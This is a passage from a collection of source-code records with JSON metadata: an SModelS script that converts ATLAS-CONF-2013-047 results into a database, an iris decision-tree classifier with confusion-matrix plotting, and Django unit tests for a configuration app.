op.drop_column('answer', 'remark')\n ### end Alembic commands ###\n", "sub_path": "migrations/versions/1f249eadb14_.py", "file_name": "1f249eadb14_.py", "file_ext": "py", "file_size_in_byte": 921, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "alembic.op.add_column", "line_number": 19, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 19, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.Unicode", "line_number": 19, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 20, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 20, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.Unicode", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 28, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "31446844", "text": "#!/usr/bin/env python\n\n\"\"\"\n.. module:: convert\n :synopsis: used to create info.txt and the .txt files.\n\n\"\"\"\nimport sys\nimport os\nimport argparse\nimport types\n\nargparser = argparse.ArgumentParser(description = \n'create info.txt, txname.txt, twiki.txt and sms.py')\nargparser.add_argument ('-utilsPath', '--utilsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str)\nargparser.add_argument ('-smodelsPath', '--smodelsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str)\nargs = argparser.parse_args()\n\nif args.utilsPath:\n utilsPath = args.utilsPath\nelse:\n databaseRoot = '../../../'\n sys.path.append(os.path.abspath(databaseRoot))\n from utilsPath import utilsPath\n utilsPath = databaseRoot + utilsPath\nif args.smodelsPath:\n sys.path.append(os.path.abspath(args.smodelsPath))\n\nsys.path.append(os.path.abspath(utilsPath))\nfrom smodels_utils.dataPreparation.inputObjects import MetaInfoInput,DataSetInput\nfrom smodels_utils.dataPreparation.databaseCreation import databaseCreator\nfrom smodels_utils.dataPreparation.massPlaneObjects import x, y, z\n\n\n\n#+++++++ global info block ++++++++++++++\ninfo = MetaInfoInput('ATLAS-CONF-2013-047')\ninfo.comment = 'T5WWLSP060 and T6WWLSP060 originally have xvalue on y-axes, changed by us to M2'\ninfo.sqrts = '8.0'\ninfo.private = False\ninfo.lumi = '20.3'\ninfo.url = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/; http://cds.cern.ch/record/1547563'\ninfo.supersededBy = 'ATLAS-SUSY-2013-02'\ninfo.prettyName = '0 leptons + 2-6 jets + Etmiss'\n\n\n#+++++++ dataset block ++++++++++++++\ndataset = DataSetInput('data')\ndataset.setInfo(dataType = 'upperLimit', dataId = None)\n\n#+++++++ next txName block ++++++++++++++\nTGQ = dataset.addTxName('TGQ')\nTGQ.checked =\"VM\"\nTGQ.constraint =\"[[['jet']],[['jet','jet']]]\"\nTGQ.conditionDescription =\"None\"\nTGQ.condition =\"None\"\nTGQ.source = 'ATLAS'\nTGQ.round_to = 6 ## round to 6 digits to make PCA work.\n#+++++++ next mass plane block ++++++++++++++\nTGQ0 = TGQ.addMassPlane([[0.96*x, y], [x,y]])\nTGQ0.figure = 'Fig. 19b'\nTGQ0.figureUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_19b.png'\nTGQ0.dataUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_19b_PRELIMINARY.data'\nTGQ0.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/TGQ_exc.dat', 'orig/TGQ.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\n\n#+++++++ next txName block ++++++++++++++\nT6WW = dataset.addTxName('T6WW')\nT6WW.checked =\"VM\"\nT6WW.constraint =\"[[['jet'],['W']],[['jet'],['W']]]\"\nT6WW.conditionDescription =\"None\"\nT6WW.condition =\"None\"\nT6WW.massConstraint = None\nT6WW.source = 'ATLAS'\nT6WWoff = dataset.addTxName('T6WWoff')\nT6WWoff.constraint =\"2.23 * [[['jet'],['jet','jet']],[['jet'],['jet','jet']]]\"\nT6WWoff.conditionDescription = \"None\"\nT6WWoff.condition = \"None\"\nT6WWoff.massConstraint = [['dm >= 0.0', 'dm <= 76.0'], ['dm >= 0.0', 'dm <= 76.0']]\nT6WWoff.source = 'ATLAS'\n#+++++++ next mass plane block ++++++++++++++\nT6WWLSP060 = T6WW.addMassPlane(2*[[x, y, 60.0]])\nT6WWLSP060.figure = 'Fig. 21c'\nT6WWLSP060.figureUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21c.png'\nT6WWLSP060.dataUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21c_PRELIMINARY.data'\nT6WWLSP060.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/T6WWLSP060_exc.dat', 'orig/T6WWLSP060.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\nT6WWoff.addMassPlane(T6WWLSP060)\n#+++++++ next mass plane block ++++++++++++++\nT6WW050 = T6WW.addMassPlane(2*[[x, x*0.5+(1.-0.5)*y, y]])\nT6WW050.figure = 'Fig. 21d'\nT6WW050.figureUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21d.png'\nT6WW050.dataUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21d_PRELIMINARY.data'\nT6WW050.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/T6WW050_exc.dat', 'orig/T6WW050.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\nT6WWoff.addMassPlane(T6WW050)\n\n#+++++++ next txName block ++++++++++++++\nT2 = dataset.addTxName('T2')\nT2.checked =\"VM\"\nT2.constraint =\"[[['jet']],[['jet']]]\"\nT2.conditionDescription =\"None\"\nT2.condition =\"None\"\nT2.source = 'ATLAS'\n#+++++++ next mass plane block ++++++++++++++\nT2 = T2.addMassPlane(2*[[x, y]])\nT2.figure = 'Fig. 19c'\nT2.figureUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_19c.png'\nT2.dataUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_19c_PRELIMINARY.data'\nT2.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/T2_exc.dat', 'orig/T2.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\n\n#+++++++ next txName block ++++++++++++++\nT1 = dataset.addTxName('T1')\nT1.checked =\"VM\"\nT1.constraint =\"[[['jet','jet']],[['jet','jet']]]\"\nT1.conditionDescription =\"None\"\nT1.condition =\"None\"\nT1.source = 'ATLAS'\n#+++++++ next mass plane block ++++++++++++++\nT1 = T1.addMassPlane(2*[[x, y]])\nT1.figure = 'Fig. 19a'\nT1.figureUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_19a.png'\nT1.dataUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_19a_PRELIMINARY.data'\nT1.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/T1_exc.dat', 'orig/T1.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\n\n#+++++++ next txName block ++++++++++++++\nT5WW = dataset.addTxName('T5WW')\nT5WW.checked =\"VM\"\nT5WW.constraint =\"[[['jet','jet'],['W']],[['jet','jet'],['W']]]\"\nT5WW.conditionDescription =\"None\"\nT5WW.condition =\"None\"\nT5WW.massConstraint = None\nT5WW.source = 'ATLAS'\nT5WWoff = dataset.addTxName('T5WWoff')\nT5WWoff.constraint = \"2.23 * [[['jet','jet'],['jet','jet']],[['jet','jet'],['jet','jet']]]\"\nT5WWoff.conditionDescription = \"None\"\nT5WWoff.condition = \"None\"\nT5WWoff.massConstraint = [['dm >= 0.0', 'dm <= 76.0'], ['dm >= 0.0', 'dm <= 76.0']]\nT5WWoff.source = 'ATLAS'\n#+++++++ next mass plane block ++++++++++++++\nT5WWLSP060 = T5WW.addMassPlane(2*[[x, y, 60.0]])\nT5WWLSP060.figure = 'Fig. 21a'\nT5WWLSP060.figureUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21a.png'\nT5WWLSP060.dataUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21b_PRELIMINARY.data'\nT5WWLSP060.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/T5WWLSP60_exc.dat', 'orig/T5WWLSP060.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\nT5WWoff.addMassPlane(T5WWLSP060)\n#+++++++ next mass plane block ++++++++++++++\nT5WW050 = T5WW.addMassPlane(2*[[x, x*0.5+(1.-0.5)*y, y]])\nT5WW050.figure = 'Fig. 21b'\nT5WW050.figureUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21b.png'\nT5WW050.dataUrl = 'https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_21a_PRELIMINARY.data'\nT5WW050.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/T5WW050_exc.dat', 'orig/T5WW050.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\nT5WWoff.addMassPlane(T5WW050)\n\n#+++++++ next txName block ++++++++++++++\nT5tctc = dataset.addTxName('T5tctc')\nT5tctc.checked =\"VM\"\nT5tctc.constraint =\"[[['t'],['jet']],[['t'],['jet']]]\"\nT5tctc.conditionDescription =\"None\"\nT5tctc.condition =\"None\"\nT5tctc.source = 'ATLAS'\n#+++++++ next mass plane block ++++++++++++++\nT5tctcD020 = T5tctc.addMassPlane(2*[[x, y, y-20.0]])\nT5tctcD020.figure = \"fig 24\"\nT5tctcD020.figureUrl = \"https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_24.png\"\nT5tctcD020.dataUrl = \"https://atlas.web.cern.ch/Atlas/GROUPS/PHYSICS/CONFNOTES/ATLAS-CONF-2013-047/fig_24_PRELIMINARY.data\"\nT5tctcD020.setSources(dataLabels= ['obsExclusion', 'upperLimits'],\n dataFiles= ['orig/T5tctc_exc.dat', 'orig/T5tctc.dat'],\n dataFormats= ['txt', 'txt'],units= [None, 'fb'])\n\n\n\ndatabaseCreator.create()\n", "sub_path": "smodels-database/8TeV/ATLAS/ATLAS-CONF-2013-047/convert.py", "file_name": "convert.py", "file_ext": "py", "file_size_in_byte": 8304, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "utilsPath.utilsPath", "line_number": 29, "usage_type": "name"}, {"api_name": "sys.path.append", "line_number": 31, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 33, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 33, "usage_type": "call"}, {"api_name": "utilsPath.utilsPath", "line_number": 33, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "smodels_utils.dataPreparation.inputObjects.MetaInfoInput", "line_number": 41, "usage_type": "call"}, {"api_name": "smodels_utils.dataPreparation.inputObjects.DataSetInput", "line_number": 52, "usage_type": "call"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 64, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 64, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 87, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 87, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 96, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 96, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 113, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 113, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 129, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 129, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 152, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 152, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 161, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 161, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.x", "line_number": 178, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.massPlaneObjects.y", "line_number": 178, "usage_type": "name"}, {"api_name": "smodels_utils.dataPreparation.databaseCreation.databaseCreator.create", "line_number": 188, "usage_type": "call"}, {"api_name": "smodels_utils.dataPreparation.databaseCreation.databaseCreator", "line_number": 188, "usage_type": "name"}]} +{"seq_id": "473414916", "text": "from sklearn import tree # decision tree model\r\nfrom sklearn.datasets import load_iris # import dataset\r\nfrom sklearn.model_selection import train_test_split # splitting our data\r\nimport numpy as np\r\nfrom sklearn.metrics import confusion_matrix, classification_report\r\nimport matplotlib.pyplot as plt\r\nimport itertools\r\n\r\ndata = load_iris() # load iris data\r\nclass_names = data.target_names\r\nprint(dir(data)) # show dataset meta\r\n\r\n# prepare train and test dataset\r\nx_train, x_test, y_train, y_test = \\\r\n train_test_split(data.data, data.target, test_size=0.20, random_state=42)\r\n\r\n# show data size --> 120 samples and 4 attributes per sample\r\nprint(\"Training set with 4 features per sample\" + str(x_train.shape))\r\nprint(\"Test set with 4 features per sample\" + str(x_test.shape))\r\nprint(\"Classes for training set\" + str(y_train.shape))\r\nprint(\"Classes for test set\" + str(y_test.shape))\r\n\r\nc45_classifier = tree.DecisionTreeClassifier(criterion='entropy') # classifier object\r\n# c45_classifier.fit(x_train, y_train) # fit/train the model\r\n\r\n# train and test the model\r\ny_pred = c45_classifier.fit(x_train, y_train).predict(x_test)\r\n\r\n# calculate train accuracy\r\ntrain_accuracy = (np.sum(c45_classifier.predict(x_train) == y_train) / float(y_train.size)) * 100\r\n\r\n# calculate test accuracy\r\ntest_accuracy = (np.sum(c45_classifier.predict(x_test) == y_test) / float(y_test.size)) * 100\r\n\r\n# print accuracies\r\nprint(\"Model accuray on train sample \", str(train_accuracy) + \"%\")\r\nprint(\"Model accuray on test sample\", str(test_accuracy) + \"%\")\r\n\r\n# precision, recall, f1-score, support\r\nprint(classification_report(y_test, y_pred))\r\n\r\n# export our decision tree\r\nwith open('iris_classifier.txt', 'w') as export_file: # create file object\r\n # write c45_classifier info to export_file using export_graphviz\r\n tree.export_graphviz(c45_classifier,\r\n out_file=export_file,\r\n feature_names=data.feature_names,\r\n class_names=data.target_names,\r\n filled=True)\r\n\r\n\r\ndef plot_confusion_matrix(cm, classes,\r\n normalize=False,\r\n title='Confusion matrix',\r\n cmap=plt.cm.Blues):\r\n \"\"\"\r\n This function prints and plots the confusion matrix.\r\n Normalization can be applied by setting `normalize=True`.\r\n \"\"\"\r\n if normalize:\r\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n print(\"Normalized confusion matrix\")\r\n else:\r\n print('Confusion matrix, without normalization')\r\n\r\n print(cm)\r\n\r\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\r\n plt.title(title)\r\n plt.colorbar()\r\n tick_marks = np.arange(len(classes))\r\n plt.xticks(tick_marks, classes, rotation=45)\r\n plt.yticks(tick_marks, classes)\r\n\r\n fmt = '.2f' if normalize else 'd'\r\n thresh = cm.max() / 2.\r\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\r\n plt.text(j, i, format(cm[i, j], fmt),\r\n horizontalalignment=\"center\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\")\r\n\r\n plt.tight_layout()\r\n plt.ylabel('True label')\r\n plt.xlabel('Predicted label')\r\n\r\n\r\n# Compute confusion matrix\r\ncnf_matrix = confusion_matrix(y_test, y_pred)\r\nnp.set_printoptions(precision=2)\r\n\r\n# Plot non-normalized confusion matrix\r\nplt.figure()\r\nplot_confusion_matrix(cnf_matrix, classes=class_names,\r\n title='Confusion matrix, without normalization')\r\n\r\n# Plot normalized confusion matrix\r\nplt.figure()\r\nplot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True,\r\n title='confusion matrix for Iris Data Set')\r\n\r\n# show confusion matrix figures\r\nplt.show()\r\n", "sub_path": "iris_classifier.py", "file_name": "iris_classifier.py", "file_ext": "py", "file_size_in_byte": 3766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sklearn.datasets.load_iris", "line_number": 9, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.tree.export_graphviz", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 55, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.newaxis", "line_number": 61, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "itertools.product", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.set_printoptions", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}]} +{"seq_id": "600815648", "text": "from tests.setup import setup\nsetup()\nfrom django.test import TestCase\nfrom django.contrib import admin\nfrom django.db import IntegrityError\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom configuration.models import Configuration\nfrom test_app.models import (\n AbstractConfiguration,\n EmptyConfiguration,\n SubChildConfiguration,\n AdminStringConfiguration,\n AdminModelConfiguration,\n CustomAdmin,\n)\nfrom configuration.admin import ConfigurationAdmin, ConfigurationParentAdmin\nfrom configuration.templatetags.configuration import get_configuration\n\n\nclass ConfigurationTestCase(TestCase):\n def test_get_admin_class(self):\n c = Configuration()\n self.assertEqual(c.admin_class,\n 'configuration.admin.ConfigurationAdmin')\n self.assertIs(c.get_admin_class(), c.admin_class)\n\n def test_get_description(self):\n c = Configuration()\n self.assertEqual(c.description, 'Configuration')\n self.assertIs(c.get_description(), c.description)\n\n def test_repr(self):\n c = AbstractConfiguration()\n self.assertEqual(str(c), \"Test test\")\n\n def test_unique(self):\n EmptyConfiguration.objects.create()\n with self.assertRaises(IntegrityError):\n EmptyConfiguration.objects.create()\n\n\nclass ConfigurationManagerTestCase(TestCase):\n def test_child_get_args(self):\n with self.assertRaises(AssertionError):\n EmptyConfiguration.objects.get(1)\n\n with self.assertRaises(AssertionError):\n EmptyConfiguration.objects.get(pk=1)\n\n def test_child_get_exists(self):\n c = EmptyConfiguration.objects.create()\n self.assertEqual(c.pk, EmptyConfiguration.objects.get().pk)\n\n def test_child_get_new(self):\n self.assertIs(EmptyConfiguration.objects.get().pk, None)\n\n def test_base_get(self):\n with self.assertRaises(ObjectDoesNotExist):\n Configuration.objects.get()\n\n c = EmptyConfiguration.objects.create()\n Configuration.objects.get()\n Configuration.objects.get(pk=c.pk)\n\n\nclass ConfigurationAdminTestCase(TestCase):\n def test_permissions(self):\n ca = ConfigurationAdmin(EmptyConfiguration, admin.site)\n self.assertEqual(ca.has_add_permission(None), False)\n self.assertEqual(ca.has_delete_permission(None), False)\n\n\nclass ConfigurationParentAdminTestCase(TestCase):\n def test_permissions(self):\n cpa = ConfigurationParentAdmin(Configuration, admin.site)\n self.assertEqual(cpa.has_add_permission(None), False)\n self.assertEqual(cpa.has_delete_permission(None), False)\n\n def test_child_models(self):\n cpa = ConfigurationParentAdmin(Configuration, admin.site)\n self.assertEqual(\n cpa.get_child_models(),\n ((SubChildConfiguration, ConfigurationAdmin),\n (EmptyConfiguration, ConfigurationAdmin),\n (AdminStringConfiguration, CustomAdmin),\n (AdminModelConfiguration, CustomAdmin))\n )\n\n\nclass TemplateTagsTestCase(TestCase):\n def test_bad_strings(self):\n with self.assertRaisesRegexp(ValueError, \"^app is not a model$\"):\n get_configuration(\"app\")\n\n with self.assertRaisesRegexp(ValueError,\n \"^Could not find model app.model$\"):\n get_configuration(\"app.model\")\n\n with self.assertRaisesRegexp(ValueError,\n \"^contenttypes.ContentType \"\n \"is not a Configuration$\"):\n get_configuration(\"contenttypes.ContentType\")\n\n with self.assertRaisesRegexp(ValueError,\n \"^Could not find model \"\n \"test_app.AbstractConfiguration$\"):\n get_configuration(\"test_app.AbstractConfiguration\")\n\n def test_get(self):\n c = get_configuration(\"test_app.EmptyConfiguration\")\n self.assertIs(type(c), EmptyConfiguration)\n", "sub_path": "tests/test_configuration.py", "file_name": "test_configuration.py", "file_ext": "py", "file_size_in_byte": 3992, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tests.setup.setup", "line_number": 2, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 20, "usage_type": "name"}, {"api_name": "configuration.models.Configuration", "line_number": 22, "usage_type": "call"}, {"api_name": "configuration.models.Configuration", "line_number": 28, "usage_type": "call"}, {"api_name": "test_app.models.AbstractConfiguration", "line_number": 33, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects.create", "line_number": 37, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.IntegrityError", "line_number": 38, "usage_type": "argument"}, {"api_name": "test_app.models.EmptyConfiguration.objects.create", "line_number": 39, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 39, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 42, "usage_type": "name"}, {"api_name": "test_app.models.EmptyConfiguration.objects.get", "line_number": 45, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 45, "usage_type": "name"}, {"api_name": "test_app.models.EmptyConfiguration.objects.get", "line_number": 48, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 48, "usage_type": "name"}, {"api_name": "test_app.models.EmptyConfiguration.objects.create", "line_number": 51, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 51, "usage_type": "name"}, {"api_name": "test_app.models.EmptyConfiguration.objects.get", "line_number": 52, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 52, "usage_type": "name"}, {"api_name": "test_app.models.EmptyConfiguration.objects.get", "line_number": 55, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 55, "usage_type": "name"}, {"api_name": "django.core.exceptions.ObjectDoesNotExist", "line_number": 58, "usage_type": "argument"}, {"api_name": "configuration.models.Configuration.objects.get", "line_number": 59, "usage_type": "call"}, {"api_name": "configuration.models.Configuration.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "configuration.models.Configuration", "line_number": 59, "usage_type": "name"}, {"api_name": "test_app.models.EmptyConfiguration.objects.create", "line_number": 61, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 61, "usage_type": "name"}, {"api_name": "configuration.models.Configuration.objects.get", "line_number": 62, "usage_type": "call"}, {"api_name": "configuration.models.Configuration.objects", "line_number": 62, "usage_type": "attribute"}, {"api_name": "configuration.models.Configuration", "line_number": 62, "usage_type": "name"}, {"api_name": "configuration.models.Configuration.objects.get", "line_number": 63, "usage_type": "call"}, {"api_name": "configuration.models.Configuration.objects", "line_number": 63, "usage_type": "attribute"}, {"api_name": "configuration.models.Configuration", "line_number": 63, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 66, "usage_type": "name"}, {"api_name": "configuration.admin.ConfigurationAdmin", "line_number": 68, "usage_type": "call"}, {"api_name": "test_app.models.EmptyConfiguration", "line_number": 68, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 68, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 68, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 73, "usage_type": "name"}, {"api_name": "configuration.admin.ConfigurationParentAdmin", "line_number": 75, "usage_type": "call"}, {"api_name": "configuration.models.Configuration", "line_number": 75, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 75, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 75, "usage_type": "name"}, {"api_name": 